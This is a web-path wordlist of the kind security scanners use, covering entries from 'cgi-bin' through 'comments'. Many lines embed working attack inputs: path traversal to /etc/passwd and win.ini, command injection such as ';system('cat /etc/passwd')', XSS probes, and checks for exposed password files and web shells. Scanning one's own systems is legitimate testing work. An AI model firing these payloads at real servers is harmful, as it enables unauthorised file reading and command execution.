cgi-bin/classifieds/classifieds.cgi
cgi-bin/classifieds/index.cgi
cgi-bin/clickcount.pl?view=test
cgi-bin/clickresponder.pl
cgi-bin/cmd1.exe?/c+dir
cgi-bin/cmd.exe?/c+dir
cgi-bin/.cobalt
cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E
cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
cgi-bin/code.php
cgi-bin/code.php3
cgi-bin/
cgi-bin/com5.java
cgi-bin/com5.pl
cgi-bin/commandit.cgi
cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
cgi-bin/common/listrec.pl
cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
cgi-bin/compatible.cgi
cgi-bin/contents.htm
cgi-bin/count.cgi
cgi-bin/Count.cgi
cgi-bin/counterbanner
cgi-bin/counterbanner-ord
cgi-bin/counterfiglet/nc/
cgi-bin/counterfiglet-ord
cgi-bin/counter-ord
cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csh
cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/CSMailto.cgi
cgi-bin/CSMailto/CSMailto.cgi
cgi-bin/csNews.cgi
cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csPassword.cgi
cgi-bin/csPassword/csPassword.cgi
cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
cgi-bin/cstat.pl
cgi-bin/cutecast/members/
cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/cvsquery.cgi
cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
cgi-bin/dasp/fm_shell.asp
cgi-bin/data/fetch.php?page=
cgi-bin/date
cgi-bin/day5datacopier.cgi
cgi-bin/day5datanotifier.cgi
cgi-bin/db2www/library/document.d2w/show
cgi-bin/db4web_c/dbdirname//etc/passwd
cgi-bin/db_manager.cgi
cgi-bin/dbman/db.cgi?db=no-db
cgi-bin/dbmlparser.exe
cgi-bin/DCFORMS98.CGI
cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
cgi-bin/dcshop/auth_data/auth_user_file.txt
cgi-bin/DCShop/auth_data/auth_user_file.txt
cgi-bin/dcshop/orders/orders.txt
cgi-bin/DCShop/orders/orders.txt
cgi-bin/dfire.cgi
cgi-bin/diagnose.cgi
cgi-bin/dig.cgi
cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
cgi-bin/displayTC.pl
cgi-bin/dnewsweb
cgi-bin/donothing
cgi-bin/dose.pl?daily&somefile.txt&|ls|
cgi-bin/download.cgi
cgi-bin/dumpenv.pl
cgi-bin/echo.bat
cgi-bin/echo.bat?&dir+c:\
cgi-bin/edit.pl
cgi-bin/empower?DB=whateverwhatever
cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/enter.cgi
cgi-bin/environ.cgi
cgi-bin/environ.pl
cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script>
cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
cgi-bin/excite
cgi-bin/excite;IFS=\"$\";/bin/cat
cgi-bin/ex-logger.pl
cgi-bin/ezadmin.cgi
cgi-bin/ezboard.cgi
cgi-bin/ezman.cgi
cgi-bin/ezshopper2/loadpage.cgi
cgi-bin/ezshopper3/loadpage.cgi
cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
cgi-bin/faxsurvey?cat%20/etc/passwd
cgi-bin/.fhp
cgi-bin/filemail
cgi-bin/filemail.pl
cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/finger
cgi-bin/finger.pl
cgi-bin/flexform
cgi-bin/flexform.cgi
cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
cgi-bin/FormHandler.cgi?
cgi-bin/formmail
cgi-bin/formmail.cgi
cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script>
cgi-bin/formmail.pl
cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/fortune
cgi-bin/foxweb.dll
cgi-bin/foxweb.exe
cgi-bin/fpadmin.htm
cgi-bin/fpremadm.exe
cgi-bin/fpsrvadm.exe
cgi-bin/ftp.pl
cgi-bin/ftpsh
cgi-bin/gbadmin.cgi?action=change_adminpass
cgi-bin/gbadmin.cgi?action=change_automail
cgi-bin/gbadmin.cgi?action=colors
cgi-bin/gbadmin.cgi?action=setup
cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls
cgi-bin/gbpass.pl
cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
cgi-bin/get32.exe
cgi-bin/getdoc.cgi
cgi-bin/gettransbitmap
cgi-bin/gH.cgi
cgi-bin/glimpse
cgi-bin/gm-authors.cgi
cgi-bin/gm.cgi
cgi-bin/gm-cplog.cgi
cgi-bin/guestbook.cgi
cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
cgi-bin/guestbook/passwd
cgi-bin/guestbook.pl
cgi-bin/GW5/GWWEB.EXE
cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
cgi-bin/GWWEB.EXE?HELP=bad-request
cgi-bin/handler
cgi-bin/handler.cgi
cgi-bin/handler/netsonar;cat
cgi-bin/hello.bat?&dir+c:\
cgi-bin/hitview.cgi
cgi-bin/horde/test.php
cgi-bin/horde/test.php?mode=phpinfo
cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
cgi-bin/.htaccess
cgi-bin/.htaccess~
cgi-bin/.htaccess.old
cgi-bin/.htaccess.save
cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
cgi-bin/htimage.exe
cgi-bin/htimage.exe/path/filename?2,2
cgi-bin/html2chtml.cgi
cgi-bin/html2wml.cgi
cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
cgi-bin/.htpasswd
cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
cgi-bin/htsearch?-c/nonexistant
cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
cgi-bin/htsearch?exclude=%60/etc/passwd%60
cgi-bin/ibill.pm
cgi-bin/icat
cgi-bin/if/admin/nph-build.cgi
cgi-bin/ikonboard/help.cgi?
cgi-bin/imagefolio/admin/admin.cgi
cgi-bin/ImageFolio/admin/admin.cgi
cgi-bin/imageFolio.cgi
cgi-bin/imagemap
cgi-bin/imagemap.exe
cgi-bin/include/new-visitor.inc.php
cgi-bin/index.js0x70
cgi-bin/index.pl
cgi-bin/info2www
cgi-bin/infosrch.cgi
cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
cgi-bin/ion-p?page=../../../../../etc/passwd
cgi-bin/jailshell
cgi-bin/jj
cgi-bin/journal.cgi?folder=journal.cgi%00
cgi-bin/ksh
cgi-bin/lastlines.cgi?process
cgi-bin/listrec.pl
cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/log/
cgi-bin/login.cgi
cgi-bin/login.pl
cgi-bin/login.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
cgi-bin/logit.cgi
cgi-bin/log/nether-log.pl?checkit
cgi-bin/log-reader.cgi
cgi-bin/logs/
cgi-bin/logs/access_log
cgi-bin/logs/error_log
cgi-bin/logs.pl
cgi-bin/lookwho.cgi
cgi-bin/ls
cgi-bin/lwgate
cgi-bin/LWGate
cgi-bin/lwgate.cgi
cgi-bin/LWGate.cgi
cgi-bin/MachineInfo
cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
cgi-bin/mail
cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/mailform.exe
cgi-bin/mailit.pl
cgi-bin/maillist.cgi
cgi-bin/maillist.pl
cgi-bin/mailnews.cgi
cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
cgi-bin/main_menu.pl
cgi-bin/majordomo.pl
cgi-bin/man2html
cgi-bin/man.sh
cgi-bin/mastergate/search.cgi?search=0&search_on=all
cgi-bin/meta.pl
cgi-bin/mgrqcgi
cgi-bin/mini_logger.cgi
cgi-bin/minimal.exe
cgi-bin/mkilog.exe
cgi-bin/mkplog.exe
cgi-bin/mmstdod.cgi
cgi-bin/moin.cgi?test
cgi-bin/mojo/mojo.cgi
cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
cgi-bin/mrtg.cgi?cfg=blah
cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/MsmMask.exe
cgi-bin/MsmMask.exe?mask=/junk334
cgi-bin/ms_proxy_auth_query/
cgi-bin/mt/
cgi-bin/mt/mt.cfg
cgi-bin/mt/mt-check.cgi
cgi-bin/mt/mt-load.cgi
cgi-bin/mt-static/
cgi-bin/mt-static/mt.cfg
cgi-bin/mt-static/mt-check.cgi
cgi-bin/mt-static/mt-load.cgi
cgi-bin/multihtml.pl?multi=/etc/passwd%00html
cgi-bin/musicqueue.cgi
cgi-bin/myguestbook.cgi?action=view
cgi-bin/namazu.cgi
cgi-bin/nbmember.cgi?cmd=list_all_users
cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
cgi-bin/netpad.cgi
cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
cgi-bin/nimages.php
cgi-bin/nlog-smb.cgi
cgi-bin/nlog-smb.pl
cgi-bin/non-existent.pl
cgi-bin/noshell
cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/nph-error.pl
cgi-bin/nph-exploitscanget.cgi
cgi-bin/nph-maillist.pl
cgi-bin/nph-publish
cgi-bin/nph-publish.cgi
cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
cgi-bin/nph-test-cgi
cgi-bin/.nsconfig
cgi-bin/ntitar.pl
cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/opendir.php?/etc/passwd
cgi-bin/orders/orders.txt
cgi-bin/pagelog.cgi
cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
cgi-bin/parse-file
cgi-bin/pass
cgi-bin/.passwd
cgi-bin/passwd
cgi-bin/passwd.txt
cgi-bin/password
cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
cgi-bin/Pbcgi.exe
cgi-bin/perl
cgi-bin/perl.exe
cgi-bin/perl.exe?-v
cgi-bin/perlshop.cgi
cgi-bin/perl?-v
cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd
cgi-bin/phf
cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
cgi-bin/photo/
cgi-bin/photo/manage.cgi
cgi-bin/photo/protected/manage.cgi
cgi-bin/php-cgi
cgi-bin/php.cgi?/etc/passwd
cgi-bin/plusmail
cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
cgi-bin/pollssi.cgi
cgi-bin/post16.exe
cgi-bin/post32.exe|dir%20c:\
cgi-bin/postcards.cgi
cgi-bin/post-query
cgi-bin/post_query
cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/ppdscgi.exe
cgi-bin/printenv
cgi-bin/printenv.tmp
cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
cgi-bin/processit.pl
cgi-bin/profile.cgi
cgi-bin/pu3.pl
cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
cgi-bin/query
cgi-bin/query?mss=%2e%2e/config
cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
cgi-bin/quikstore.cfg
cgi-bin/quizme.cgi
cgi-bin/ratlog.cgi
cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/redirect
cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
cgi-bin/register.cgi
cgi-bin/replicator/webpage.cgi/
cgi-bin/responder.cgi
cgi-bin/retrieve_password.pl
cgi-bin/rguest.exe
cgi-bin/rightfax/fuwww.dll/?
cgi-bin/rksh
cgi-bin/rmp_query
cgi-bin/robadmin.cgi
cgi-bin/robpoll.cgi
cgi-bin/rpm_query
cgi-bin/rsh
cgi-bin/rtm.log
cgi-bin/rwcgi60
cgi-bin/rwcgi60/showenv
cgi-bin/rwwwshell.pl
cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
cgi-bin/sbcgi/sitebuilder.cgi
cgi-bin/scoadminreg.cgi
cgi-bin/scripts/*%0a.pl
cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid
cgi-bin-sdb/printenv
cgi-bin/search
cgi-bin/search.cgi
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>
cgi-bin/search.pl
cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
cgi-bin/sendform.cgi
cgi-bin/sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
cgi-bin/sensepost.exe?/c+dir
cgi-bin/session/adminlogin
cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
cgi-bin/SGB_DIR/superguestconfig
cgi-bin/sh
cgi-bin/shop/auth_data/auth_user_file.txt
cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
cgi-bin/shop/orders/orders.txt
cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
cgi-bin/shop.pl/page=;cat%20shop.pl|
cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
cgi-bin/show.pl
cgi-bin/showuser.cgi
cgi-bin/shtml.dll
cgi-bin/simplestguest.cgi
cgi-bin/simplestmail.cgi
cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/snorkerz.bat
cgi-bin/snorkerz.cmd
cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
cgi-bin/spin_client.cgi?aaaaaaaa
cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
cgi-bin/ss
cgi-bin/sscd_suncourier.pl
cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/stat/
cgi-bin/stat.pl
cgi-bin/stats/
cgi-bin/stats-bin-p/reports/index.html
cgi-bin/statsconfig
cgi-bin/stats_old/
cgi-bin/stats.pl
cgi-bin/stats.prf
cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
cgi-bin/statusconfig.pl
cgi-bin/statview.pl
cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
cgi-bin/store/agora.cgi?page=whatever33.html
cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/survey
cgi-bin/survey.cgi
cgi-bin/sws/admin.html
cgi-bin/sws/manager.pl
cgi-bin/tablebuild.pl
cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
cgi-bin/tcsh
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
cgi-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/test-cgi
cgi-bin/test-cgi?/*
cgi-bin/test.cgi
cgi-bin/test-cgi.bat
cgi-bin/testcgi.exe
cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
cgi-bin/test-cgi.tcl
cgi-bin/test-env
cgi-bin/testing_whatever
cgi-bin/test/test.cgi
cgi-bin/texis.exe/junk
cgi-bin/texis/junk
cgi-bin/texis/phine
cgi-bin/textcounter.pl
cgi-bin/tidfinder.cgi
cgi-bin/tigvote.cgi
cgi-bin/title.cgi
cgi-bin/tpgnrock
cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/troops.cgi
cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
cgi-bin/ultraboard.cgi
cgi-bin/ultraboard.pl
cgi-bin/unlg1.1
cgi-bin/unlg1.2
cgi-bin/update.dpgs
cgi-bin/upload.cgi
cgi-bin/Upload.pl
cgi-bin/uptime
cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
cgi-bin/utm/admin
cgi-bin/utm/utm_stat
cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;
cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgi-bin/viewlogs.pl
cgi-bin/view-source
cgi-bin/viewsource?/etc/passwd
cgi-bin/view-source?view-source
cgi-bin/viralator.cgi
cgi-bin/virgil.cgi
cgi-bin/visadmin.exe
cgi-bin/visitor.exe
cgi-bin/vote.cgi
cgi-bin/vpasswd.cgi
cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>
cgi-bin/VsSetCookie.exe?
cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
cgi-bin//_vti_pvt/doctodep.btr
cgi-bin/w3-msql
cgi-bin/w3-sql
cgi-bin/wais.pl
cgi-bin/way-board.cgi?db=/etc/passwd%00
cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
cgi-bin/wconsole.dll
cgi-bin/webais
cgi-bin/webbbs.cgi
cgi-bin/webbbs.exe
cgi-bin/webbbs/webbbs_config.pl?name=joe&[email protected]&body=aaaaffff&followup=10;cat%20/etc/passwd
cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
cgi-bin/webdist.cgi
cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
cgi-bin/webdriver
cgi-bin/webfind.exe?keywords=01234567890123456789
cgi-bin/webgais
cgi-bin/webif.cgi
cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/webmap.cgi
cgi-bin/Webnews.exe
cgi-bin/webnews.pl
cgi-bin/webplus?about
cgi-bin/webplus.exe?about
cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
cgi-bin/websendmail
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
cgi-bin/webutil.pl
cgi-bin/webutils.pl
cgi-bin/webwho.pl
cgi-bin/wguest.exe
cgi-bin/where.pl?sd=ls%20/etc
cgi-bin/whois.cgi?action=load&whois=%3Bid
cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/windmail
cgi-bin/windmail.exe
cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%[email protected]%20|%20dir%20c:\
cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/wrap
cgi-bin/wrap.cgi
cgi-bin/ws_ftp.ini
cgi-bin/WS_FTP.ini
cgi-bin/.www_acl
cgi-bin/.wwwacl
cgi-bin/wwwadmin.pl
cgi-bin/wwwboard.cgi.cgi
cgi-bin/wwwboard.pl
cgi-bin/www-sql
cgi-bin/wwwstats.pl
cgi-bin/wwwthreads/3tvars.pm
cgi-bin/wwwthreads/w3tvars.pm
cgi-bin/wwwwais
cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
cgi-bin/zsh
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
cgi/cgiproc?
cgi-data
cgi-dos/args.bat
cgi-exe
cgi-home
cgi-image
cgi-local
cgi-local/cgiemail-1.4/cgicso?query=AAA
cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
cgi-local/cgiemail-1.6/cgicso?query=AAA
cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
cgi-perl
cgi.pl/
cgi-pub
cgis
cgi-script
Cgishell.pl
cgi-shl
cgi-shl/win-c-sample.exe
cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgis/wwwboard/wwwboard.cgi
cgis/wwwboard/wwwboard.pl
cgi-sys
cgi-sys/addalink.cgi
cgi-sys/cgiecho
cgi-sys/cgiemail
cgi-sys/countedit
cgi-sys/domainredirect.cgi
cgi-sys/entropybanner.cgi
cgi-sys/entropysearch.cgi
cgi-sys/FormMail-clone.cgi
cgi-sys/helpdesk.cgi
cgi-sys/mchat.cgi
cgi-sys/randhtml.cgi
cgi-sys/realhelpdesk.cgi
cgi-sys/realsignup.cgi
cgi-sys/scgiwrap
cgi-sys/signup.cgi
cgi-web
cgi-win
cgi-win/cgitest.exe
cgi-win/uploader.exe
cgiwrap
cgm-web
ch
chan
change
changeall.php
changed
change.log
changelog
ChangeLog
CHANGELOG
changelog.txt
Changelog.txt
ChangeLog.txt
CHANGELOG.txt
change_password
changepassword
changepw
changepwd
changes
CHANGES.html
changes.txt
channel
charge
charges
chart
charts
chassis/config/GeneralChassisConfig.html
chat
chat/data/usr
chat_dir/register.php
chatlog.nsf
chat/!nicks.txt
chat/!pwds.txt
chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")<script>
chats
check
checked_accounts.txt
checking
checkout
checkoutanon
checkout_iclear
checkout_payment.php
checkoutreview
checkpoint
checks
.checkstyle
child
children
china
chk
choosing
chpasswd
chpwd
chris
chrome
chubb.xml
c-h.v2.php
cidr.txtа
cinema
cisco
cisweb
cities
citrix
citrix/
Citrix/ICAWEB/
Citrix/MetaFrameXP/default/login.asp
Citrix/PNAgent/
Citrix/PNAgent/config.xml
city
citydesk.xml
ck
ckeditor
ckeditor/
ckeditor/ckfinder/ckfinder.html
ckeditor/ckfinder/core/connector/asp/connector.asp
ckeditor/ckfinder/core/connector/aspx/connector.aspx
ckeditor/ckfinder/core/connector/php/connector.php
ckfinder
ckfinder/ckfinder.html
cl
claim
claims
class
classes
classes/adodb/server.php
classes/cookie.txt
classic
classified
classifieds
class/mysql.class
.classpath
classroompages
clbusy.nsf
cldbdir.nsf
cleanup
cleanup.log
clear
clearcookies
clearpixel
cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\"><
cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>
click
clickheat
clickout
clicks
client
client/
clientaccesspolicy
clientaccesspolicy.xml
ClientAccessPolicy.xml
clientapi
cliente/
cliente/downloads/h4xor.php
clientes
clientes/
clients
clients/
clientscript
clients.mdb
clients.sql
clients.sqlite
clients.zip
clipart
clips
clk
clock
clocktower/
close
closed
closing
club
clusta4.nsf
cluster
clusterframe.jsp
clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
clusters
cm
cm/
cmd
cmdasp.asp
cmpi_popup
cms
cms/
CMS
cms-admin
cmsadmin
cms/cms.csproj
cms.csproj
cms/spaw2/dialogs/dialog.php
cms/Web.config
cn
cnf
cnstats
cnt
co
.cobalt
.cobalt/sysManage/../admin/.htaccess
cocoon
_code
code
code/
codec
codeception.yml
codecs
.codeintel
.codekit-cache
codepages
codes
.codio
coffee
cognos
coke
coldfusion
collapse
collect4.nsf
collection
college
columnists
columns
com
com/
COM
com1
com2
com3
com4
comics
comm
command
comment
commentary
commented
comment-page
comment-page-1
comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
comments
comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
